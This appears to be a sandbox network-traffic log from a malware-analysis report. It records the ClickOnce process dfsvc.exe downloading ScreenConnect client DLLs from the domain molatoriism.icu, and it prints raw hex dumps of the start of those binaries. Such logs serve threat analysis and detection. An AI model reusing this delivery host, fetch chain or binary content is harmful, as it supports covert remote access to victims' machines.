                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                9192.168.2.949872104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:56:17 UTC123OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-11-07 16:56:17 UTC769INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:17 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QcNGSogH6PtyNTdnHOhem1oTMwQwuGUMSEXeJeJXhBIkMcnYBSBQwQIBMnP4CZJPPEnKC0B5%2BNqUZKsEkovFXo32VWsSrxjFMrrB8upYan9UAtziqKo%2BibNmBFOTqVddgyM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedb1719466b4b-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1155&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=714&delivery_rate=2337368&cwnd=251&unsent_bytes=0&cid=62c24d0c7e665eca&ts=304&x=0"
                                                                                                                                                                                                2024-11-07 16:56:17 UTC600INData Raw: 37 64 35 34 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 d8 54 90 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 64 fa 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                                                                                                                                                                Data Ascii: 7d54MZ@!L!This program cannot be run in DOS mode.$PEL0T" 0 @ d@
                                                                                                                                                                                                2024-11-07 16:56:17 UTC1369INData Raw: 28 18 00 00 0a 2a 5e 02 28 18 00 00 0a 02 17 8d 82 00 00 01 25 16 03 9c 7d 01 00 00 04 2a 3a 02 28 18 00 00 0a 02 03 7d 01 00 00 04 2a 3a 02 28 18 00 00 0a 02 03 7d 02 00 00 04 2a 3a 02 28 18 00 00 0a 02 03 7d 03 00 00 04 2a 96 7e 2c 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 69 00 00 06 73 19 00 00 0a 25 80 2c 00 00 04 28 01 00 00 2b 2a 76 73 8d 00 00 06 25 02 7d 50 00 00 04 fe 06 8e 00 00 06 73 1b 00 00 0a 28 1c 00 00 0a 2a 00 00 00 13 30 06 00 0d 01 00 00 01 00 00 11 02 73 1d 00 00 0a 7d 05 00 00 04 02 73 1d 00 00 0a 7d 06 00 00 04 02 16 8d 18 00 00 01 7d 0e 00 00 04 02 03 04 28 26 00 00 06 02 05 7d 04 00 00 04 02 28 14 00 00 06 26 02 28 29 00 00 06 02 fe 06 1b 00 00 06 73 1e 00 00 0a 6f 1f 00 00 0a 02 28 29 00 00 06 7e 2d 00 00 04 25 2d 17 26 7e 2b 00
                                                                                                                                                                                                Data Ascii: (*^(%}*:(}*:(}*:(}*~,%-&~+is%,(+*vs%}Ps(*0s}s}}(&}(&()so()~-%-&~+
                                                                                                                                                                                                2024-11-07 16:56:17 UTC1369INData Raw: 00 04 6f 45 00 00 0a 20 0b 06 00 00 33 2b 11 0a 13 0e 11 0b 13 0f 12 0e 28 48 00 00 0a 12 0f 28 48 00 00 0a fe 01 12 0e 28 49 00 00 0a 12 0f 28 49 00 00 0a fe 01 5f 2d 64 12 0a 28 49 00 00 0a 2d 03 17 2b 2a 12 0a 28 48 00 00 0a 7e 25 00 00 04 25 2d 13 26 14 fe 06 4a 00 00 0a 73 4b 00 00 0a 25 80 25 00 00 04 28 04 00 00 2b 16 fe 01 2c 2c 7e 28 00 00 0a 02 28 28 00 00 06 6f 4d 00 00 0a 6f 4e 00 00 0a 2c 15 02 17 28 17 00 00 06 02 73 4f 00 00 0a 17 11 0a 28 0e 00 00 06 02 7b 08 00 00 04 d0 1f 00 00 01 28 50 00 00 0a 11 07 7b 52 00 00 04 6f 51 00 00 0a 11 09 2d 03 17 2b 11 11 09 28 45 00 00 0a 20 0b 06 00 00 fe 01 16 fe 01 2d 2b 11 0a 13 0f 11 0b 13 0e 12 0f 28 48 00 00 0a 12 0e 28 48 00 00 0a fe 01 12 0f 28 49 00 00 0a 12 0e 28 49 00 00 0a fe 01 5f 2d 79 11
                                                                                                                                                                                                Data Ascii: oE 3+(H(H(I(I_-d(I-+*(H~%%-&JsK%%(+,,~(((oMoN,(sO({(P{RoQ-+(E -+(H(H(I(I_-y
                                                                                                                                                                                                2024-11-07 16:56:17 UTC1369INData Raw: 26 2b 18 11 16 6f 6c 00 00 0a 17 33 0e 7e 6d 00 00 0a 11 17 16 28 6f 00 00 0a 26 16 0b 38 24 03 00 00 03 75 26 00 00 01 13 18 11 18 39 c9 00 00 00 11 18 6f 70 00 00 0a 2d 07 18 0b 38 05 03 00 00 11 18 6f 70 00 00 0a 17 40 f8 02 00 00 02 7b 05 00 00 04 13 08 11 08 28 2d 00 00 0a 02 7b 08 00 00 04 7e 34 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 71 00 00 06 73 71 00 00 0a 25 80 34 00 00 04 28 0b 00 00 2b 13 19 17 0b 73 72 00 00 0a 25 7e 28 00 00 0a 6f 73 00 00 0a 11 19 28 74 00 00 0a 28 75 00 00 0a 6f 76 00 00 0a 25 7e 28 00 00 0a 6f 77 00 00 0a 11 19 28 74 00 00 0a 28 75 00 00 0a 6f 78 00 00 0a 25 7e 28 00 00 0a 6f 79 00 00 0a 11 19 28 74 00 00 0a 28 75 00 00 0a 6f 7a 00 00 0a 0a dd 5c 02 00 00 26 16 0b dd 54 02 00 00 11 08 28 33 00 00 0a dc 73 9b 00 00 06
                                                                                                                                                                                                Data Ascii: &+ol3~m(o&8$u&9op-8op@{(-{~4%-&~+qsq%4(+sr%~(os(t(uov%~(ow(t(uox%~(oy(t(uoz\&T(3s
                                                                                                                                                                                                2024-11-07 16:56:17 UTC1369INData Raw: 9c 00 00 0a 16 6f 62 00 00 06 02 7b 07 00 00 04 07 6f 9e 00 00 0a de 00 07 17 59 0b 07 16 3c 64 ff ff ff de 07 06 28 33 00 00 0a dc 2a 00 00 01 1c 00 00 00 00 7c 00 14 90 00 21 12 00 00 01 02 00 0d 00 b1 be 00 07 00 00 00 00 13 30 07 00 9d 01 00 00 07 00 00 11 04 75 2c 00 00 01 0a 06 39 e5 00 00 00 02 7b 0d 00 00 04 03 73 9f 00 00 0a 25 06 6f a0 00 00 0a 7e 3c 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 79 00 00 06 73 a1 00 00 0a 25 80 3c 00 00 04 28 10 00 00 2b 7e 3d 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 7a 00 00 06 73 a3 00 00 0a 25 80 3d 00 00 04 28 11 00 00 2b 16 28 12 00 00 2b 6f a5 00 00 0a 25 06 6f a6 00 00 0a 7e 3e 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 7b 00 00 06 73 a1 00 00 0a 25 80 3e 00 00 04 28 10 00 00 2b 16 28 12 00 00 2b 6f a7 00 00
                                                                                                                                                                                                Data Ascii: ob{oY<d(3*|!0u,9{s%o~<%-&~+ys%<(+~=%-&~+zs%=(+(+o%o~>%-&~+{s%>(+(+o
                                                                                                                                                                                                2024-11-07 16:56:17 UTC1369INData Raw: 2b 00 00 04 fe 06 84 00 00 06 73 ce 00 00 0a 25 80 47 00 00 04 28 1d 00 00 2b 28 1e 00 00 2b 7d 71 00 00 04 06 7e 28 00 00 0a 6f d0 00 00 0a 2c 07 28 d1 00 00 0a 2d 72 02 7b 04 00 00 04 15 2e 14 07 06 fe 06 b8 00 00 06 73 d2 00 00 0a 28 1f 00 00 2b 2d 48 28 d4 00 00 0a 0d 12 03 28 49 00 00 0a 2c 21 06 12 03 28 48 00 00 0a 7d 70 00 00 04 07 06 fe 06 b9 00 00 06 73 d2 00 00 0a 28 1f 00 00 2b 2d 0b 12 03 fe 15 11 00 00 1b 09 2b 20 06 7b 70 00 00 04 73 d5 00 00 0a 2b 13 02 7b 04 00 00 04 73 d5 00 00 0a 2b 06 16 73 d5 00 00 0a 7d 72 00 00 04 07 06 fe 06 ba 00 00 06 73 d6 00 00 0a 28 20 00 00 2b 06 fe 06 bb 00 00 06 73 d7 00 00 0a 28 d1 00 00 0a 28 21 00 00 2b 7e 48 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 85 00 00 06 73 d9 00 00 0a 25 80 48 00 00 04 28 22 00
                                                                                                                                                                                                Data Ascii: +s%G(+(+}q~(o,(-r{.s(+-H((I,!(H}ps(+-+ {ps+{s+s}rs( +s((!+~H%-&~+s%H("
                                                                                                                                                                                                2024-11-07 16:56:17 UTC1369INData Raw: 0a 25 80 4d 00 00 04 28 2e 00 00 2b 28 2f 00 00 2b 13 0a 09 11 0a 66 5f 16 13 0b 28 30 00 00 2b 6f 04 01 00 0a 13 0c 38 96 00 00 00 11 0c 6f 05 01 00 0a 13 0d 12 01 28 8a 00 00 0a 08 11 0d 02 fe 06 10 00 00 06 73 06 01 00 0a 06 7b 77 00 00 04 25 2d 18 26 06 06 fe 06 c6 00 00 06 73 be 00 00 0a 25 13 0f 7d 77 00 00 04 11 0f 06 7b 78 00 00 04 25 2d 18 26 06 06 fe 06 c7 00 00 06 73 07 01 00 0a 25 13 10 7d 78 00 00 04 11 10 28 61 00 00 06 13 0e 11 0e 2c 2a 11 0e 02 7b 08 00 00 04 6f 60 00 00 06 17 13 0b 02 7b 07 00 00 04 11 0e 6f 08 01 00 0a de 0b 26 11 0e 16 6f 62 00 00 06 de 00 11 0c 6f 11 00 00 0a 3a 5e ff ff ff de 0c 11 0c 2c 07 11 0c 6f 10 00 00 0a dc 11 0b 2c 41 02 7b 08 00 00 04 7e 4e 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 8b 00 00 06 73 09 01 00 0a
                                                                                                                                                                                                Data Ascii: %M(.+(/+f_(0+o8o(s{w%-&s%}w{x%-&s%}x(a,*{o`{o&obo:^,o,A{~N%-&~+s
                                                                                                                                                                                                2024-11-07 16:56:17 UTC1369INData Raw: 31 01 00 0a 6f 32 01 00 0a 25 03 7b 33 01 00 0a 6f 34 01 00 0a 25 03 7b 35 01 00 0a 6f 36 01 00 0a 25 03 7b 37 01 00 0a 6f 38 01 00 0a 25 02 03 7b 37 01 00 0a 03 7b 35 01 00 0a 28 15 00 00 06 6f 39 01 00 0a 2a 00 00 1b 30 03 00 64 00 00 00 11 00 00 11 28 3a 01 00 0a 0a 06 02 28 27 00 00 06 28 3b 01 00 0a 0b 07 28 3c 01 00 0a 28 3d 01 00 0a 26 de 14 07 2c 06 07 6f 10 00 00 0a dc 06 2c 06 06 6f 10 00 00 0a dc 7e 3e 01 00 0a 72 20 03 00 70 17 6f 3f 01 00 0a 0c 08 2d 02 de 18 08 02 28 27 00 00 06 28 40 01 00 0a de 0a 08 2c 06 08 6f 10 00 00 0a dc 2a 01 28 00 00 02 00 13 00 0e 21 00 0a 00 00 00 00 02 00 06 00 25 2b 00 0a 00 00 00 00 02 00 46 00 13 59 00 0a 00 00 00 00 c6 03 02 7b 08 00 00 04 7e 44 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 81 00 00 06 73 71 00
                                                                                                                                                                                                Data Ascii: 1o2%{3o4%{5o6%{7o8%{7{5(o9*0d(:('(;(<(=&,o,o~>r po?-('(@,o*(!%+FY{~D%-&~+sq
                                                                                                                                                                                                2024-11-07 16:56:17 UTC1369INData Raw: 7b 63 01 00 0a 12 09 fe 15 1a 00 00 01 11 09 28 64 01 00 0a 2c 0c 11 08 7b 65 01 00 0a 39 c6 00 00 00 02 7b 17 00 00 04 7e 90 00 00 04 25 2d 17 26 7e 8a 00 00 04 fe 06 d8 00 00 06 73 58 01 00 0a 25 80 90 00 00 04 28 3f 00 00 2b 11 07 7b 99 00 00 04 25 2d 1a 26 11 07 11 07 fe 06 e4 00 00 06 73 58 01 00 0a 25 13 0a 7d 99 00 00 04 11 0a 28 3f 00 00 2b 6f 60 01 00 0a 13 06 2b 50 11 06 6f 61 01 00 0a 13 0b 28 66 01 00 0a 11 0b 7b 82 00 00 04 11 07 7c 98 00 00 04 7b 65 01 00 0a 6f 67 01 00 0a 11 0b 7b 82 00 00 04 6f 68 01 00 0a de 1c 26 11 0b 7b 7f 00 00 04 1b 2e 08 11 0b 1a 7d 7f 00 00 04 11 0b 28 37 00 00 06 de 00 11 06 6f 11 00 00 0a 2d a7 dd 04 ff ff ff 11 06 2c 07 11 06 6f 10 00 00 0a dc 02 28 55 01 00 0a 07 15 6a 2e 16 28 97 00 00 0a 6f fc 00 00 0a 07 59
                                                                                                                                                                                                Data Ascii: {c(d,{e9{~%-&~sX%(?+{%-&sX%}(?+o`+Poa(f{|{eog{oh&{.}(7o-,o(Uj.(oY
                                                                                                                                                                                                2024-11-07 16:56:18 UTC1369INData Raw: 00 00 06 25 2d 04 26 14 2b 05 6f 25 00 00 0a 02 06 06 6f 1e 01 00 0a 28 81 01 00 0a 28 82 01 00 0a 2a 13 30 05 00 23 00 00 00 18 00 00 11 12 01 fe 15 73 00 00 01 12 01 02 7d 83 01 00 0a 07 0a 14 03 19 12 00 17 28 84 01 00 0a 28 82 01 00 0a 2a 00 13 30 05 00 23 00 00 00 18 00 00 11 12 01 fe 15 73 00 00 01 12 01 02 7d 83 01 00 0a 07 0a 14 03 19 12 00 17 28 85 01 00 0a 28 82 01 00 0a 2a 00 1b 30 06 00 89 00 00 00 19 00 00 11 12 02 fe 15 74 00 00 01 12 02 02 7d 86 01 00 0a 12 02 03 7d 87 01 00 0a 12 02 17 7d 88 01 00 0a 12 02 04 7d 89 01 00 0a 08 0a 14 17 12 00 12 01 28 8a 01 00 0a 28 82 01 00 0a 05 2d 4b 7e 8b 01 00 0a 72 5e 04 00 70 17 17 17 28 8c 01 00 0a 0d 17 1a 73 8d 01 00 0a 13 04 09 28 3c 01 00 0a 02 16 1a 11 04 6f 8e 01 00 0a 1a 28 8f 01 00 0a 26 de
                                                                                                                                                                                                Data Ascii: %-&+o%o((*0#s}((*0#s}((*0t}}}}((-K~r^p(s(<o(&


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                10192.168.2.949879104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:56:18 UTC93OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                2024-11-07 16:56:19 UTC771INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:19 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6MbaGBx7WTUeFeuvRYk7Az97ro85sl%2FF73%2FTdjdnpQDfEP7NBVFF0KjiaT1slAD8gkdzN82gNH%2F7iqMxwlfH0BpuEM2jP1z8HffvaOXrYcnZnGoGdl3UCh2Hh3BndTPoUVI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedb1e5c292cde-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1664&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=708&delivery_rate=1777777&cwnd=251&unsent_bytes=0&cid=284a5b169de660b1&ts=642&x=0"
                                                                                                                                                                                                2024-11-07 16:56:19 UTC598INData Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c da d0 ab 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 82 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 5b ab 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                                                                                                                                                                Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$PELl" 0>] ` [@
                                                                                                                                                                                                2024-11-07 16:56:19 UTC1369INData Raw: 1e 02 28 29 00 00 0a 2a 5e 02 28 29 00 00 0a 02 17 8d c9 00 00 01 25 16 03 9c 7d 01 00 00 04 2a 3a 02 28 29 00 00 0a 02 03 7d 01 00 00 04 2a 3a 02 28 29 00 00 0a 02 03 7d 02 00 00 04 2a 3a 02 28 29 00 00 0a 02 03 7d 03 00 00 04 2a 1e 02 73 2a 00 00 0a 2a 1e 02 73 2b 00 00 0a 2a 3a 02 28 2c 00 00 0a 02 03 28 2d 00 00 0a 2a 1e 02 7b 2e 00 00 0a 2a 22 02 03 7d 2e 00 00 0a 2a 4a 02 28 2f 00 00 0a 8c 0f 00 00 1b 28 30 00 00 0a 26 2a 3a 02 28 2c 00 00 0a 02 03 28 31 00 00 0a 2a 1e 02 7b 32 00 00 0a 2a 22 02 03 7d 32 00 00 0a 2a 13 30 02 00 28 00 00 00 01 00 00 11 02 28 33 00 00 0a 0a 16 0b 2b 16 06 07 a3 0f 00 00 1b 8c 0f 00 00 1b 28 30 00 00 0a 26 07 17 58 0b 07 06 8e 69 32 e4 2a 76 02 28 2c 00 00 0a 02 73 34 00 00 0a 7d 0b 00 00 04 02 73 35 00 00 0a 7d 0c 00
                                                                                                                                                                                                Data Ascii: ()*^()%}*:()}*:()}*:()}*s**s+*:(,(-*{.*"}.*J(/(0&*:(,(1*{2*"}2*0((3+(0&Xi2*v(,s4}s5}
                                                                                                                                                                                                2024-11-07 16:56:19 UTC1369INData Raw: 06 25 06 fe 06 be 02 00 06 73 5f 00 00 0a 6f 26 00 00 06 2a 00 00 00 13 30 04 00 29 00 00 00 08 00 00 11 02 12 00 04 05 6f 60 00 00 0a 2d 09 0e 04 28 cb 00 00 06 14 2a 73 3e 00 00 06 25 06 6f 22 00 00 06 25 03 6f 26 00 00 06 2a 00 00 00 13 30 04 00 41 00 00 00 0a 00 00 11 73 61 00 00 0a 0a 06 03 7d 62 00 00 0a 02 12 01 04 05 6f 60 00 00 0a 2d 09 0e 04 28 cb 00 00 06 14 2a 73 3e 00 00 06 25 07 6f 22 00 00 06 25 06 fe 06 63 00 00 0a 73 5f 00 00 0a 6f 26 00 00 06 2a 00 00 00 13 30 04 00 29 00 00 00 08 00 00 11 02 04 05 12 00 6f 64 00 00 0a 2d 09 0e 04 28 cb 00 00 06 14 2a 73 3e 00 00 06 25 06 6f 22 00 00 06 25 03 6f 26 00 00 06 2a 00 00 00 13 30 04 00 41 00 00 00 0b 00 00 11 73 65 00 00 0a 0a 06 03 7d 66 00 00 0a 02 04 05 12 01 6f 64 00 00 0a 2d 09 0e 04 28
                                                                                                                                                                                                Data Ascii: %s_o&*0)o`-(*s>%o"%o&*0Asa}bo`-(*s>%o"%cs_o&*0)od-(*s>%o"%o&*0Ase}fod-(
                                                                                                                                                                                                2024-11-07 16:56:19 UTC1369INData Raw: 15 00 00 04 0a 06 0b 07 03 28 88 00 00 0a 74 01 00 00 1b 0c 02 7c 15 00 00 04 08 07 28 0b 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 04 00 5b 00 00 00 14 00 00 11 04 28 89 00 00 0a 0a 06 20 00 01 00 00 2e 18 06 20 01 01 00 00 2e 10 06 20 04 01 00 00 2e 08 06 20 05 01 00 00 33 26 05 d0 b0 00 00 02 28 51 00 00 0a 28 8a 00 00 0a a5 b0 00 00 02 0b 02 07 6f 41 00 00 06 2c 07 17 28 8b 00 00 0a 2a 7e 5e 00 00 0a 03 04 05 28 d3 01 00 06 2a 1e 02 7b 16 00 00 04 2a 22 02 03 7d 16 00 00 04 2a 1e 02 7b 17 00 00 04 2a 22 02 03 7d 17 00 00 04 2a 1e 02 28 8c 00 00 0a 2a 00 00 00 13 30 04 00 48 00 00 00 08 00 00 11 03 28 8d 00 00 0a 20 0a 02 00 00 33 39 03 28 8e 00 00 0a 28 21 01 00 06 28 9f 01 00 06 0a 06 7e 5e 00 00 0a 28 84 00 00 0a 2c 1b 06 03 28 8d 00 00 0a 03 28 8f
                                                                                                                                                                                                Data Ascii: (t|(+3*0[( . . . 3&(Q(oA,(*~^(*{*"}*{*"}*(*0H( 39((!(~^(,((
                                                                                                                                                                                                2024-11-07 16:56:19 UTC1369INData Raw: 7b 22 00 00 04 02 fe 06 5f 00 00 06 73 ae 00 00 0a 6f af 00 00 0a 02 7b 21 00 00 04 73 b0 00 00 0a 6f b1 00 00 0a 02 7b 21 00 00 04 6f b2 00 00 0a 6f b3 00 00 0a 72 51 00 00 70 6f b4 00 00 0a 26 02 7b 21 00 00 04 6f b2 00 00 0a 02 fe 06 5b 00 00 06 73 b5 00 00 0a 6f b6 00 00 0a 02 73 b7 00 00 0a 7d 1f 00 00 04 02 28 b8 00 00 0a 7e 5e 00 00 0a 20 fa 00 00 00 7e 5e 00 00 0a 28 bb 01 00 06 26 2a 00 1b 30 04 00 59 01 00 00 18 00 00 11 02 03 28 b9 00 00 0a 03 28 8d 00 00 0a 20 13 01 00 00 40 41 01 00 00 14 0a 02 7b 1f 00 00 04 0b 07 28 4c 00 00 0a 02 7b 1f 00 00 04 02 7b 20 00 00 04 02 7b 1f 00 00 04 6f ba 00 00 0a 02 7b 20 00 00 04 59 6f bb 00 00 0a 28 0e 00 00 2b 0a 02 02 7b 1f 00 00 04 6f ba 00 00 0a 7d 20 00 00 04 de 07 07 28 56 00 00 0a dc 06 6f bd 00 00
                                                                                                                                                                                                Data Ascii: {"_so{!so{!oorQpo&{!o[sos}(~^ ~^(&*0Y(( @A{(L{{ {o{ Yo(+{o} (Vo
                                                                                                                                                                                                2024-11-07 16:56:19 UTC1369INData Raw: 6f e5 00 00 0a 6f e6 00 00 0a 74 2c 00 00 02 0a 06 02 fe 06 6c 00 00 06 73 e7 00 00 0a 6f d2 02 00 06 02 7b 23 00 00 04 03 6f e1 00 00 0a 06 6f e8 00 00 0a 06 2a 00 00 1b 30 05 00 bb 01 00 00 1b 00 00 11 02 03 28 5c 00 00 06 03 6f b3 00 00 0a 02 7b 24 00 00 04 2d 07 72 bb 00 00 70 2b 05 72 c7 00 00 70 14 02 fe 06 6e 00 00 06 73 ae 00 00 0a 1f 73 73 d0 00 00 0a 6f d1 00 00 0a 26 03 6f b3 00 00 0a 73 d2 00 00 0a 6f d1 00 00 0a 26 28 00 01 00 06 6f 20 00 00 0a 0a 38 47 01 00 00 06 6f 1f 00 00 0a 0b 02 07 28 6a 00 00 06 0c 03 6f b3 00 00 0a 07 6f e9 00 00 0a 6f b4 00 00 0a 74 40 00 00 01 0d 09 08 6f ea 00 00 0a 08 6f cf 02 00 06 7e 97 00 00 04 25 2d 17 26 7e 96 00 00 04 fe 06 d9 02 00 06 73 eb 00 00 0a 25 80 97 00 00 04 28 0f 00 00 2b 6f ed 00 00 0a 13 04 38
                                                                                                                                                                                                Data Ascii: oot,lso{#oo*0(\o{$-rp+rpnssso&oso&(o 8Go(jooot@oo~%-&~s%(+o8
                                                                                                                                                                                                2024-11-07 16:56:19 UTC1369INData Raw: 7b 28 00 00 04 6f fd 00 00 0a 0c 12 02 28 ff 00 00 0a 1f 20 16 28 54 00 00 06 7d 2b 00 00 04 02 7b 2b 00 00 04 6f 52 00 00 06 16 16 02 7b 28 00 00 04 6f fd 00 00 0a 0c 12 02 28 fe 00 00 0a 02 7b 28 00 00 04 6f fd 00 00 0a 0c 12 02 28 ff 00 00 0a 02 7b 2a 00 00 04 6f 52 00 00 06 12 00 28 03 01 00 0a 12 00 28 04 01 00 0a 20 20 00 cc 00 28 52 01 00 06 26 02 7b 2a 00 00 04 6f 52 00 00 06 28 05 01 00 0a 0d 02 7b 28 00 00 04 6f 06 01 00 0a 28 10 00 00 2b 09 06 6f 07 01 00 0a de 0a 09 2c 06 09 6f 11 00 00 0a dc 02 7b 27 00 00 04 03 17 02 7b 2a 00 00 04 6f 4f 00 00 06 02 7b 2a 00 00 04 6f 08 01 00 0a 28 95 00 00 0a 02 7b 2a 00 00 04 6f 02 01 00 0a 5a 16 16 d3 16 d3 28 3a 02 00 06 28 04 01 00 06 02 7b 28 00 00 04 39 c2 00 00 00 12 04 02 7c 29 00 00 04 28 fa 00 00
                                                                                                                                                                                                Data Ascii: {(o( (T}+{+oR{(o({(o({*oR(( (R&{*oR({(o(+o,o{'{*oO{*o({*oZ(:({(9|)(
                                                                                                                                                                                                2024-11-07 16:56:19 UTC1369INData Raw: 72 c1 01 00 70 18 16 e0 16 e0 16 e0 16 e0 12 08 e0 12 0e e0 28 81 01 00 06 28 04 01 00 06 12 0a 08 8e 69 7d 4e 02 00 04 12 08 e0 16 e0 04 6f 15 01 00 0a 20 1c 08 00 00 16 1f 10 16 e0 16 12 09 e0 12 0c e0 12 0f e0 16 e0 28 82 01 00 06 18 8d db 00 00 01 25 17 20 12 03 09 00 9e 28 03 01 00 06 2b 5d 11 10 2c 59 11 10 28 24 01 00 0a 13 27 11 27 16 09 16 11 27 8e 69 28 25 01 00 0a 12 0b 11 27 8e 69 7d 4e 02 00 04 12 0a 08 8e 69 7d 4e 02 00 04 12 08 e0 12 09 e0 04 6f 15 01 00 0a 20 1c 08 00 00 16 1f 10 12 0d e0 16 12 09 e0 12 0c e0 12 0f e0 16 e0 28 82 01 00 06 28 04 01 00 06 08 16 11 0a 7b 4e 02 00 04 28 26 01 00 0a 13 1c 11 16 72 cb 01 00 70 11 1c 28 93 00 00 0a 6f 18 01 00 0a 11 16 72 01 02 00 70 6f 18 01 00 0a 2b 2c 07 2c 29 04 6f 19 01 00 0a 28 1a 01 00 0a
                                                                                                                                                                                                Data Ascii: rp((i}No (% (+],Y($'''i(%'i}Ni}No (({N(&rp(orpo+,,)o(
                                                                                                                                                                                                2024-11-07 16:56:19 UTC1369INData Raw: 9a 00 00 04 28 16 00 00 2b 28 17 00 00 2b 28 18 00 00 2b 13 08 11 08 28 4c 01 00 0a 2d 05 11 08 0d de 02 fe 1a 09 2a 00 00 01 10 00 00 00 00 00 00 62 62 00 da 15 00 00 01 13 30 05 00 76 00 00 00 22 00 00 11 73 e3 02 00 06 0a 06 28 19 00 00 2b 7d 9c 00 00 04 28 4e 01 00 0a 28 4f 01 00 0a 6f 50 01 00 0a 0b 06 fe 06 e4 02 00 06 73 51 01 00 0a 14 28 52 01 00 0a 26 06 7b 9c 00 00 04 8e 69 07 8e 69 58 8d c9 00 00 01 0c 06 7b 9c 00 00 04 16 08 16 06 7b 9c 00 00 04 8e 69 28 25 01 00 0a 07 16 08 06 7b 9c 00 00 04 8e 69 07 8e 69 28 25 01 00 0a 08 28 53 01 00 0a 2a 4a 7e 34 01 00 0a 6f 54 01 00 0a 20 e8 03 00 00 5a 6a 2a 1a 73 de 02 00 06 2a 2e 7e 34 01 00 0a 6f 55 01 00 0a 2a 2e 7e 34 01 00 0a 6f 56 01 00 0a 2a 2e 7e 34 01 00 0a 6f 57 01 00 0a 2a 2e 7e 34 01 00 0a
